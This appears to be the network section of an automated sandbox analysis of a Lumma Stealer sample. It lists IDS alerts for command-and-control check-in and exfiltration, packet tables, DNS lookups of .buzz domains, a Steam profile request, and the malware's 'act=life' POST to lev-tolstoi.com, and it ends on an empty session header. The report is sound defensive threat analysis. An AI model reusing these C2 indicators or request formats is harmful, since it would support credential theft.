2024-12-28T09:48:38.310814+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.12	49712	104.21.66.86	443	TCP
2024-12-28T09:48:38.310814+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49712	104.21.66.86	443	TCP
2024-12-28T09:48:39.594125+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49713	104.21.66.86	443	TCP
2024-12-28T09:48:40.368182+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.12	49713	104.21.66.86	443	TCP
2024-12-28T09:48:40.368182+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49713	104.21.66.86	443	TCP
2024-12-28T09:48:42.463592+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49714	104.21.66.86	443	TCP
2024-12-28T09:48:44.887570+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49716	104.21.66.86	443	TCP
2024-12-28T09:48:45.765797+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.12	49716	104.21.66.86	443	TCP
2024-12-28T09:48:47.523499+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49718	104.21.66.86	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:48:33.606810093 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:33.606842995 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:33.606914997 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:33.610207081 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:33.610214949 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:35.101865053 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:35.101953030 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:35.104899883 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:35.104922056 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:35.105290890 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:35.154515028 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:35.159674883 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:35.203336954 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.030873060 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.030904055 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.030939102 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.030958891 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.030970097 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.030983925 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.030993938 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.030999899 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.031032085 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.031032085 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.031044960 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.098372936 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.098453045 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.098474026 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.098493099 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.098630905 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.150429010 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.150507927 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.150536060 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.150585890 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.150615931 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.152843952 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.152869940 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.152884007 CET	49711	443	192.168.2.12	23.55.153.106
Dec 28, 2024 09:48:36.152890921 CET	443	49711	23.55.153.106	192.168.2.12
Dec 28, 2024 09:48:36.296744108 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:36.296796083 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:36.296896935 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:36.297272921 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:36.297286034 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:37.558368921 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:37.558557987 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:37.660310984 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:37.660346985 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:37.660722971 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:37.663973093 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:37.664088011 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:37.664124966 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:38.310836077 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:38.310918093 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:38.310977936 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:38.325670958 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:38.325707912 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:38.325717926 CET	49712	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:38.325725079 CET	443	49712	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:38.383421898 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:38.383460045 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:38.383579969 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:38.383881092 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:38.383899927 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:39.594032049 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:39.594125032 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:39.595478058 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:39.595496893 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:39.595752954 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:39.597001076 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:39.597055912 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:39.597115993 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.368191004 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.368243933 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.368273020 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.368324995 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.368329048 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.368345976 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.368379116 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.368407965 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.368416071 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.368474960 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.376660109 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.382009029 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.382025957 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.385102034 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.385189056 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.385205030 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.435827971 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.487689018 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.529520988 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.529542923 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.563808918 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.563874960 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.563893080 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.564105034 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.564244032 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.564258099 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.564596891 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.590528965 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.590559006 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:40.590605974 CET	49713	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:40.590611935 CET	443	49713	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:41.206916094 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:41.206942081 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:41.207019091 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:41.207432032 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:41.207439899 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:42.463397026 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:42.463592052 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:42.468621969 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:42.468635082 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:42.468909025 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:42.470444918 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:42.470664024 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:42.470695972 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:43.460634947 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:43.460731030 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:43.460794926 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:43.461040020 CET	49714	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:43.461057901 CET	443	49714	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:43.583833933 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:43.583894968 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:43.583983898 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:43.584379911 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:43.584403038 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:44.887468100 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:44.887569904 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:44.889672041 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:44.889682055 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:44.889988899 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:44.891366959 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:44.891504049 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:44.891529083 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:44.891590118 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:44.891594887 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:45.765799046 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:45.765889883 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:45.766146898 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:45.766349077 CET	49716	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:45.766360044 CET	443	49716	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:45.986793041 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:45.986841917 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:45.986994028 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:45.987344980 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:45.987360001 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:47.523428917 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:47.523499012 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:47.524919033 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:47.524924040 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:47.525187969 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:47.526348114 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:47.526492119 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:47.526525974 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:47.526597977 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:47.526607037 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:48.474767923 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:48.474860907 CET	443	49718	104.21.66.86	192.168.2.12
Dec 28, 2024 09:48:48.474987030 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:48.475284100 CET	49718	443	192.168.2.12	104.21.66.86
Dec 28, 2024 09:48:48.475298882 CET	443	49718	104.21.66.86	192.168.2.12

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:48:32.269640923 CET	52022	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:32.409610987 CET	53	52022	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:32.439990044 CET	63819	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:32.580216885 CET	53	63819	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:32.582215071 CET	55902	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:32.722377062 CET	53	55902	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:32.737634897 CET	59941	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:32.877528906 CET	53	59941	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:32.880819082 CET	51301	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:33.020616055 CET	53	51301	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:33.023643970 CET	56534	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:33.163485050 CET	53	56534	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:33.166898966 CET	57509	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:33.307174921 CET	53	57509	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:33.312980890 CET	54403	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:33.457463026 CET	53	54403	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:33.460690022 CET	55808	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:33.600184917 CET	53	55808	1.1.1.1	192.168.2.12
Dec 28, 2024 09:48:36.156743050 CET	60652	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:48:36.295772076 CET	53	60652	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:48:32.269640923 CET	192.168.2.12	1.1.1.1	0xec43	Standard query (0)	cashfuzysao.buzz	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:32.439990044 CET	192.168.2.12	1.1.1.1	0x2dc7	Standard query (0)	prisonyfork.buzz	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:32.582215071 CET	192.168.2.12	1.1.1.1	0xa0e	Standard query (0)	rebuildeso.buzz	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:32.737634897 CET	192.168.2.12	1.1.1.1	0xb535	Standard query (0)	scentniej.buzz	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:32.880819082 CET	192.168.2.12	1.1.1.1	0xbb27	Standard query (0)	inherineau.buzz	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.023643970 CET	192.168.2.12	1.1.1.1	0xdbd2	Standard query (0)	screwamusresz.buzz	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.166898966 CET	192.168.2.12	1.1.1.1	0xe245	Standard query (0)	appliacnesot.buzz	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.312980890 CET	192.168.2.12	1.1.1.1	0x760f	Standard query (0)	hummskitnj.buzz	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.460690022 CET	192.168.2.12	1.1.1.1	0x48e3	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:36.156743050 CET	192.168.2.12	1.1.1.1	0x28fd	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:48:32.409610987 CET	1.1.1.1	192.168.2.12	0xec43	Name error (3)	cashfuzysao.buzz	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:32.580216885 CET	1.1.1.1	192.168.2.12	0x2dc7	Name error (3)	prisonyfork.buzz	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:32.722377062 CET	1.1.1.1	192.168.2.12	0xa0e	Name error (3)	rebuildeso.buzz	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:32.877528906 CET	1.1.1.1	192.168.2.12	0xb535	Name error (3)	scentniej.buzz	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.020616055 CET	1.1.1.1	192.168.2.12	0xbb27	Name error (3)	inherineau.buzz	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.163485050 CET	1.1.1.1	192.168.2.12	0xdbd2	Name error (3)	screwamusresz.buzz	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.307174921 CET	1.1.1.1	192.168.2.12	0xe245	Name error (3)	appliacnesot.buzz	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.457463026 CET	1.1.1.1	192.168.2.12	0x760f	Name error (3)	hummskitnj.buzz	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:33.600184917 CET	1.1.1.1	192.168.2.12	0x48e3	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:36.295772076 CET	1.1.1.1	192.168.2.12	0x28fd	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:48:36.295772076 CET	1.1.1.1	192.168.2.12	0x28fd	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49711	23.55.153.106	443	7024	C:\Users\user\Desktop\H1iOI9vWfh.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:48:35 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-28 08:48:36 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 28 Dec 2024 08:48:35 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=814182be37ba3d0d16430cb1; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-28 08:48:36 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-28 08:48:36 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-28 08:48:36 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49712	104.21.66.86	443	7024	C:\Users\user\Desktop\H1iOI9vWfh.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:48:37 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-28 08:48:37 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 08:48:38 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:48:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2np929nq8voapl3e8sgt9ol7r4; expires=Wed, 23 Apr 2025 02:35:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GU0TfhW2hOE%2BVd0Tpe2SjdnbDfb6F%2B5nqCHM5MakKGlxDVLg6lWNAn6bG%2BgV2el4jDyFZNgXmMQ3t2nnRCnrihhuuN5JqAOMX9a%2BQ5Yif4znbossRftJPdXb1LEsLmaEFFs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f904adc7ea94213-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1588&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1631284&cwnd=229&unsent_bytes=0&cid=732a8b19d447fd42&ts=763&x=0"
2024-12-28 08:48:38 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 08:48:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
